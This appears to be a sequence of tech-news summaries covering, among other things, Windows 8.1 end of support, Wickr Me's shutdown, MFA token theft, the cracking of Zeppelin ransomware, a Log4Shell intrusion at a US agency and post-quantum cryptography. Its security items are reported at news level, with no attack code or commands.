Mark Hachman, writing for PCWorld: Windows 8 stunk. It might have helped cost chief executive Steve Ballmer his job. Windows 8.1 was a bit better -- but if you love it, you have only a month or so left to enjoy it. Microsoft will kill off Windows 8.1 support on January 10, 2023. There's no out: Microsoft will not be offering an extended support package for Windows 8.1. At that point, you'll have a choice: buy a new Windows PC, or officially pay to upgrade to either Windows 10 or Windows 11. What does the end of support mean? Until January 10, Microsoft will offer security patches and other fixes for any security issues that crop up. Afterwards, you're on your own. If any exploit or malware surfaces, you'll have to depend on any antivirus software you have running -- Microsoft won't be issuing any more patches after Jan. 10, and your PC will absolutely be at risk.

An anonymous reader shares a report: A little more than a year ago, Amazon, specifically Amazon Web Services, flashed its stacks of cash as it announced it was buying up the end-to-end encrypted messaging app Wickr. AWS users could suddenly use Wickr's services, and some reporters speculated Amazon could have been trying to make a move in the increasingly crowded encrypted messaging space. That's much more unlikely now as Amazon announced Monday it was nixing its secure messaging app Wickr Me.

The tech giant said that Wickr would instead be focused on business and public sector communications, specifically through AWS Wickr and Wickr Enterprise. The company will no longer allow registrations for Wickr Me after Dec. 31, and a year later, at the tail end of 2023, the app will be but a puff of smoke and a memory. Wickr was worth in the ballpark of $60 million when it was purchased, but just a few years ago Wickr was spouting off about its features that encrypted conference calls, which was a major evolution in the encrypted messaging space. Amazon's other messaging app, Chime, does videoconferencing without encryption. In September, Amazon finally added end-to-end encryption for the data sent to users through its Ring doorbells.

Through 2020 America's professional lives "had taken on the overtones of a secular religion," argues a writer in the Washington Post, with jobs forming "a primary way to find meaning in the world and a crucial part of our identity.... Even precarious, low-paying gigs were valorized as 'hustle culture,' representing freedom to perform labor on our terms."

But then... Fast-forward to fall 2022. The number of people quitting, while down from the peak, remains at the highest level since the 1970s. White-collar workers don't want to give up working remotely. Low-paying sectors such as the hospitality industry can't find enough people willing to work for the wages on offer. Union organizing and strikes have been on an upswing.... [W]hat's increasingly clear is that the March 2020 decision to partially close down the American economy shattered Americans' dysfunctional, profoundly unequal relationship with work like nothing in decades. And even if there was great discomfort in a shutdown that severed almost every one of us from assumptions about how we earn a living, we also found an unexpected opportunity: to remake our relationship with the labor that fills our days....

All of it — the lockdowns, the disease, the sudden change in household functioning and how or whether we worked at all — amounted to a massive psychological shock, leading many to ask why labor looms so large in our psyches. "It really was an opportunity — an unwelcome opportunity — to take a look at the mad scramble that many of us have just assumed was normal," said Kate Shindle, who as president of the Actors' Equity Association represents a particularly hard-hit industry. Then, when the economy unexpectedly boomed back, Americans were poised to pivot. As many had recognized, it was one thing to seek meaning in work but another to see our lives subsumed by it — and for what? A less-than-adequate paycheck? A job that could literally kill you? "Maybe the poor safety net really kept people from analyzing the role of work in their lives," David Blustein, author of "The Importance of Work in an Age of Uncertainty" and a professor at Boston College's Lynch School of Education and Human Development, told me. "Maybe the American work ethic was a form of survival...."

Over and over, when people spoke to journalists, including me, about why they made changes in their professional lives since March 2020, they told us they liked receiving better wages when they switched employers. But even more, they wanted greater control over the terms of their labor.... An increased level of remote work, likely in a hybrid format, is almost certainly here to stay, says Nick Bloom, a professor of economics at Stanford University, who has studied the topic for decades. Employees want it, technological advances continue to make it easier, and companies that forbid it completely are likely to find themselves at a disadvantage....

The past two and a half years brought immense upheaval, and we'll be struggling to process the resulting changes for years. But it's undeniable that some of these shifts were long overdue. Workers are highly unlikely to forget what we learned: namely, that our jobs are much more flexible than we thought.

"Get ready: Neurotechnology is coming to the workplace," claims IEEE Spectrum: Neural sensors are now reliable and affordable enough to support commercial pilot projects that extract productivity-enhancing data from workers' brains.

These projects aren't confined to specialized workplaces; they're also happening in offices, factories, farms, and airports. The companies and people behind these neurotech devices are certain that they will improve our lives. But there are serious questions about whether work should be organized around certain functions of the brain, rather than the person as a whole.

To be clear, the kind of neurotech that's currently available is nowhere close to reading minds. Sensors detect electrical activity across different areas of the brain, and the patterns in that activity can be broadly correlated with different feelings or physiological responses, such as stress, focus, or a reaction to external stimuli. These data can be exploited to make workers more efficient — and, proponents of the technology say, to make them happier. Two of the most interesting innovators in this field are the Israel-based startup InnerEye, which aims to give workers superhuman abilities, and Emotiv, a Silicon Valley neurotech company that's bringing a brain-tracking wearable to office workers, including those working remotely....

EEG has recently broken out of clinics and labs and has entered the consumer marketplace. This move has been driven by a new class of "dry" electrodes that can operate without conductive gel, a substantial reduction in the number of electrodes necessary to collect useful data, and advances in artificial intelligence that make it far easier to interpret the data. Some EEG headsets are even available directly to consumers for a few hundred dollars.

Microsoft says token theft attacks are on the rise. From a report: Microsoft has outlined several mitigations to protect against attacks on multi-factor authentication that will unfortunately make life more difficult for your remote workers. Three years ago, attacks on multi-factor authentication (MFA) were so rare that Microsoft didn't have decent statistics on them, largely because few organisations had enabled MFA. But with MFA use rising as attacks on passwords become more common, Microsoft has seen an increase in attackers using token theft in their attempts to sidestep MFA.

In these attacks, the attacker compromises a token issued to someone who's already completed MFA and replays that token to gain access from a different device. Tokens are central to OAuth 2.0 identity platforms, including Azure Active Directory (AD), which aim to make authentication simpler and faster for users, but in a way that's still resilient to password attacks. Moreover, Microsoft warns that token theft is dangerous because it doesn't require high technical skills, detection is difficult and, because the technique has only recently seen an uptick, few organisations have mitigations in place. "Recently, the Microsoft Detection and Response Team (DART) has seen an increase in attackers utilizing token theft for this purpose," Microsoft says in a blogpost. "By compromising and replaying a token issued to an identity that has already completed multifactor authentication, the threat actor satisfies the validation of MFA and access is granted to organizational resources accordingly. This poses to be a concerning tactic for defenders because the expertise needed to compromise a token is very low, is hard to detect, and few organizations have token theft mitigations in their incident response plan."

Brian Krebs writes via KrebsOnSecurity: Peter is an IT manager for a technology manufacturer that got hit with a Russian ransomware strain called "Zeppelin" in May 2020. He'd been on the job less than six months, and because of the way his predecessor architected things, the company's data backups also were encrypted by Zeppelin. After two weeks of stalling their extortionists, Peter's bosses were ready to capitulate and pay the ransom demand. Then came the unlikely call from an FBI agent. "Don't pay," the agent said. "We've found someone who can crack the encryption." Peter, who spoke candidly about the attack on condition of anonymity, said the FBI told him to contact a cybersecurity consulting firm in New Jersey called Unit 221B, and specifically its founder -- Lance James. Zeppelin sprang onto the crimeware scene in December 2019, but it wasn't long before James discovered multiple vulnerabilities in the malware's encryption routines that allowed him to brute-force the decryption keys in a matter of hours, using nearly 100 cloud computer servers.

In an interview with KrebsOnSecurity, James said Unit 221B was wary of advertising its ability to crack Zeppelin ransomware keys because it didn't want to tip its hand to Zeppelin's creators, who were likely to modify their file encryption approach if they detected it was somehow being bypassed. This is not an idle concern. There are multiple examples of ransomware groups doing just that after security researchers crowed about finding vulnerabilities in their ransomware code. "The minute you announce you've got a decryptor for some ransomware, they change up the code," James said. But he said the Zeppelin group appears to have stopped spreading their ransomware code gradually over the past year, possibly because Unit 221B's referrals from the FBI let them quietly help nearly two dozen victim organizations recover without paying their extortionists. [...]

The researchers said their break came when they understood that while Zeppelin used three different types of encryption keys to encrypt files, they could undo the whole scheme by factoring or computing just one of them: An ephemeral RSA-512 public key that is randomly generated on each machine it infects. "If we can recover the RSA-512 Public Key from the registry, we can crack it and get the 256-bit AES Key that encrypts the files!" [James and co-author Joel Lathrop wrote in a blog post]. "The challenge was that they delete the [public key] once the files are fully encrypted. Memory analysis gave us about a 5-minute window after files were encrypted to retrieve this public key." Unit 221B ultimately built a "Live CD" version of Linux that victims could run on infected systems to extract that RSA-512 key. From there, they would load the keys into a cluster of 800 CPUs donated by hosting giant Digital Ocean that would then start cracking them. The company also used that same donated infrastructure to help victims decrypt their data using the recovered keys. A more technical writeup on Unit 221B's discoveries (cheekily titled "0XDEAD ZEPPELIN") is available here.

joshuark writes: Yikes, gadzooks, and shiver my timbers! Elastic Labs has found surprisingly that 50% of malware comes from one app: MacKeeper, ironically. Ironic in that MacKeeper claims to "keep your Mac clean and safe with zero effort." MacKeeper also has a tainted reputation for being difficult to completely uninstall and as a malicious antivirus.

A new spin on the biblical phrase, "Am I my brother's keeper..." Well, when the inmate is running the asylum. The findings appear in Elastic Security Labs' recently released 2022 Global Threat Report. As Neowin reports, MacKeeper "can be abused by threat actors because it has extensive permissions and access to processes and files."

With that said, the report found that only 6.2% of malware ends up on macOS devices, compared to 54.4% and 39.4% on Windows and Linux, respectively.

1Password has announced that passkey support will be available to its customers in "early 2023," allowing users to securely log in to apps and websites without a password. The Verge reports: Passkeys are a passwordless login technology developed by the FIDO Alliance, whose members include most of the Big Tech companies. The tech allows users to replace traditional passwords with their device's own authentication -- such as an iPhone with Face ID -- offering greater security and protection since there's no password to steal or accidentally hand over via a phishing attack.

1Password claims its own variation, called Universal Sign On, will be superior to others by supporting multiple platforms and cross-platform syncing when it launches next year. By contrast, passkey support through companies like Apple is only built to seamlessly synchronize access on devices within the same ecosystem. A live demonstration of how passkeys will work is available for 1Password users using the latest version of its Chrome browser extension, alongside a video demo for those not using the service and a directory listing which websites, apps, and services are using passkeys for authentication. 1Password will bring full support for passkeys to its browser extension and desktop apps in early 2023, with mobile support to follow.

A frustrated owner of an RTX 4090 graphics card, suffering from the infamous melty power connector problem, has filed a class action suit against Nvidia. From a report: Filed in a California court on November 11th, the suit may make for painful reading for Nvidia and includes numerous allegations from fraud to unjust enrichment. The case refers to widely reported instances of the new-style 16-pin power connector used by Nvidia's GeForce RTX 4090 boards overheating and melting under heavy load. Reportedly, the lawsuit claims that Nvidia sold RTX 4090s with, "defective and dangerous power cable plug and socket(s), which has rendered consumers' cards inoperable and poses a serious electrical and fire hazard for each and every purchaser." It's notable that the claimant, one Lucas Genova, describes himself as "experienced in the installation of computer componentry like graphics cards," thereby aiming to head off any implication of user error at the pass.

India will be adopting USB-C type as a common charging port for smart devices, with stakeholders reaching a consensus at a meeting of an inter-ministerial task force, consumer affairs secretary Rohit Kumar Singh said on Wednesday. From a report: The government held wide-ranging consultations to standardize charging ports for all compatible smart devices, but it is yet to reach a decision on chargers for low-cost feature phones. With universal chargers consumers will no longer need a different charger every time they purchase a new device. Besides, the move will also reduce massive amounts of e-waste. In 2021, India is estimated to have generated 5 million tonnes of e-waste , only behind China and the US, according to an ASSOCHAM-EY report, Electronic Waste Management in India.

Microsoft has fixed yet another problem in some versions of Windows 10, a bug that makes the taskbar and desktop temporarily vanish or causes the system to ignore you. From a report: According to Redmond, users "might experience an error in which the desktop or taskbar might momentarily disappear, or your device might become unresponsive." The issue affects PCs running Windows 10 versions 22H2, 21H2, 21H1, and 20H2, the company wrote on its Windows Health Dashboard. Microsoft didn't outline the exact cause but notes it was related to the KB5016688 220820_03051 cumulative update and later.

The software giant is using its Known Issue Rollback (KIR) feature -- which enables IT administrators to roll back the unwanted changes of an update -- to resolve the problem, adding that it could take up to 24 hours for the fix to reach non-managed business systems and consumer devices. Restarting the device may accelerate the timeframe. Organizations that use enterprise-managed devices can install and configure a special Group Policy by going to "Computer Configuration" and then "Administrative Templates" and "Group Policy name." If the resolution doesn't work, users can try restarting the Windows device, according to Microsoft. The latest fix comes after a number of other problems were resolved this week.

Microsoft has released SQL Server 2022, the latest version of its database software, which originally launched more than 33 years ago. From a report: Microsoft describes this release as the "most Azure-enabled release of SQL Server yet" and with connections to Azure Synapse Link for enabling real-time analytics over the database, Azure Purview for data governance and disaster recovery with the help of Azure SQL Managed Instance, this release is, in many ways, the culmination of the cloud-connection groundwork the team started quite a few years ago. "From the very beginning, the vision [for SQL Server] really was about -- databases were very complex -- how do you make that extremely simple? And in many ways, I think that has been a key reason why it lasted for so long and how we've evolved it as well," Rohan Kumar, Microsoft's corporate VP for Azure Data, told me. "One of the big things that I think about with SQL Server 2022 is that we've made it completely cloud-connected to Azure."

He noted that while the migration of on-prem workloads is happening, Microsoft's customers are all moving at very different speeds and some, for a multitude of reasons, may never move to the cloud at all. That, he argues, is why the company always bet on a hybrid approach, but it is also why a lot of customers started asking about how they could get the value of being in the cloud without actually having to move all of their data to it. "That was really the key thesis of why we invested in making this into a cloud release," Kumar said. A good example here is the new disaster recovery function that allows users to replicate their data in SQL Managed Instance on Azure and use that as a backup for their main on-premises SQL Server, which should make it easy to fail over to that when the main server goes down.

An anonymous reader quotes a report from BleepingComputer: The FBI and CISA revealed in a joint advisory published today that an unnamed Iranian-backed threat group hacked a Federal Civilian Executive Branch (FCEB) organization to deploy XMRig cryptomining malware. The attackers compromised the federal network after hacking into an unpatched VMware Horizon server using an exploit targeting the Log4Shell (CVE-2021-44228) remote code execution vulnerability. After deploying the cryptocurrency miner, the Iranian threat actors also set up reverse proxies on compromised servers to maintain persistence within the FCEB agency's network.

"In the course of incident response activities, CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence," the joint advisory reads. The two U.S. federal agencies added that all organizations who haven't yet patched their VMware systems against Log4Shell should assume that they've already been breached and advise them to start hunting for malicious activity within their networks.

CISA warned in June that VMware Horizon and Unified Access Gateway (UAG) servers are still being preyed upon by multiple threat actors, including state-sponsored hacking groups, using Log4Shell exploits. Log4Shell can be exploited remotely to target vulnerable servers exposed to local or Internet access to move laterally across breached networks to access internal systems that store sensitive data.

Netflix has introduced a new account management page called "Manage Access and Devices" that gives users the ability to remove access privileges from specific devices. The feature is available on the web and in the streaming service's Android and iOS apps. Ars Technica reports: Previously, users could see a list of devices that had recently accessed their accounts, and they could revoke access to all devices simultaneously, but they could not revoke access on a case-by-case basis. Each item in the list of devices will include an IP address-based location, a device type, and the user profile that most recently accessed Netflix from that device.

Netflix describes it as a security feature, in that it's useful to users who don't share their passwords at all. For example, you now have a way to clean up after yourself if you stayed at an Airbnb and signed into your Netflix account on the smart TV there but forgot to sign out before you left. Further, the page could help you identify if someone has gained access to your account via a compromised password.

Australia will consider banning ransomware payments in a bid to undermine the cybercriminal business model, a government minister said on Sunday. From a report: Clare O'Neil, the minister for home affairs and cybersecurity, confirmed to Australia's public broadcaster ABC that the government was looking at criminalizing extortion payments as part of the government's cyber strategy. The announcement follows several large security incidents affecting the country, including most significantly the data breach of Medibank, one of the country's largest health insurance providers.

Earlier this month Medibank stated it would not be making a ransom payment after hackers gained access to the data of 9.7 million current and former customers, including 1.8 million international customers living abroad. All of the data which the criminals accessed "could have been taken," the company said. This includes sensitive health care claims data for around 480,000 individuals, including information about drug addiction treatments and abortions. O'Neil's interview followed the AFP's commissioner Reece Kershaw announcing that they had identified the individual perpetrators of the Medibank hack, and that a group based in Russia was to blame. Further reading: After Ransomware Gang Releases Sensitive Medical Data, Australia Vows Consequences.

Apple on Tuesday announced that Emergency SOS via satellite is officially available to iPhone 14 users in the US and Canada. Next month, Apple will launch Emergency SOS via satellite in France, Germany, Ireland, and the UK. Apple is enabling the feature on all iPhone 14 models that are running iOS 16.1, which was released near the end of October. From a report: If you have the feature, you'll see a new section detailing your phone's new capability of connecting to satellites, and offering a demo mode for you to get a feel for what the process is like should you ever have to use it. For those unfamiliar, Emergency SOS via Satellite will allow an iPhone 14 owner to contact emergency services when in an area without cellular or Wi-Fi coverage. The feature is triggered by calling 911 when "SOS" is shown at the top of the iPhone's screen where the cellular coverage bars are normally visible. Once you're connected to a satellite, you'll either directly exchange messages with a local dispatcher if they accept text messages, or talk with local emergency services using an Apple-trained emergency specialist as a go-between.

Google has paid out $70,000 to a security researcher for privately reporting an "accidental" security bug that allowed anyone to unlock Google Pixel phones without knowing its passcode. From a report: The lock screen bypass bug, tracked as CVE-2022-20465, is described as a local escalation of privilege bug because it allows someone, with the device in their hand, to access the device's data without having to enter the lock screen's passcode. Hungary-based researcher David Schutz said the bug was remarkably simple to exploit but took Google about five months to fix.

Schutz discovered anyone with physical access to a Google Pixel phone could swap in their own SIM card and enter its preset recovery code to bypass the Android's operating system's lock screen protections. In a blog post about the bug, published now that the bug is fixed, Schutz described how he found the bug accidentally, and reported it to Google's Android team.

India has lifted the download ban on VLC, more than nine months after it mysteriously blocked the official website of the popular media playback software in the South Asian market. From a report: VideoLAN, the popular software's developer, filed a legal notice last month seeking an explanation from the nation's IT and Telecom ministries for the block order. The Ministry of Electronics and IT has removed its ban on the website of VLC media player, New Delhi-based advocacy group Internet Freedom Foundation, which provided legal support to VideoLAN, said on Monday. VideoLAN confirmed the order. Indian telecom operators began blocking VideoLAN's official website, where it lists links to downloading VLC, in February of this year, VideoLAN president and lead developer Jean-Baptiste Kempf told TechCrunch in an earlier interview. India is one of the largest markets for VLC.

Fearing the possibility of encryption-cracking quantum computers, Quanta magazine reports that researchers are "scrambling to produce new,'post-quantum' encryption scheme." Earlier this year, the National Institute of Standards and Technology revealed four finalists in its search for a post-quantum cryptography standard. Three of them use "lattice cryptography" — a scheme inspired by lattices, regular arrangements of dots in space.

Lattice cryptography and other post-quantum possibilities differ from current standards in crucial ways. But they all rely on mathematical asymmetry. The security of many current cryptography systems is based on multiplication and factoring: Any computer can quickly multiply two numbers, but it could take centuries to factor a cryptographically large number into its prime constituents. That asymmetry makes secrets easy to encode but hard to decode.... A quirk of factoring makes it vulnerable to attack by quantum computers.... Originally developed in the 1990s, [lattice cryptography] relies on the difficulty of reverse-engineering sums of points...

Of course, it's always possible that someone will find a fatal flaw in lattice cryptography... Cryptography works until it's cracked. Indeed, earlier this summer one promising post-quantum cryptography scheme was cracked using not a quantum computer, but an ordinary laptop.
At a recent panel discussion on post-quantum cryptography, Adi Shamir (the S in RSA), expressed concern that NIST's proposed solutions are predominantly based on lattice cryptography. "In some sense, we are putting all eggs in the same basket, but that is the best we have....

"The best advice for young researchers is to stay away from lattice-based post-quantum crypto," Shamir added. "What we really lack are entirely different ideas which will turn out to be secure. So any great idea for a new basis for public-key cryptography which is not using lattices will be greatly appreciated."

A report from the Georgetown's Center on Education and the Workforce found that Bachelor's degree holders generally earn 84% more than those with just a high school diploma, reports CNBC.

"Still, 44% of all job seekers with college degrees regret their field of study." Journalism, sociology, communications and education all topped the list of most-regretted college majors, according to ZipRecruiter's survey of more than 1,500 college graduates who were looking for a job. "When you are barely managing to pay your bills, your paycheck might become more important." Of graduates who regretted their major, most said that, if they could go back, they would now choose computer science or business administration instead.

All in, the top-paying college majors earn $3.4 million more than the lowest-paying majors over a lifetime.

Graduates entering the workforce with good career prospects and high starting salaries are the most satisfied with their field of study, job site ZipRecruiter also found. Computer science majors, with an average annual starting salary of almost $100,000, were the happiest overall, according to ZipRecruiter. Students who majored in criminology, engineering, nursing, business and finance also felt very good about their choices.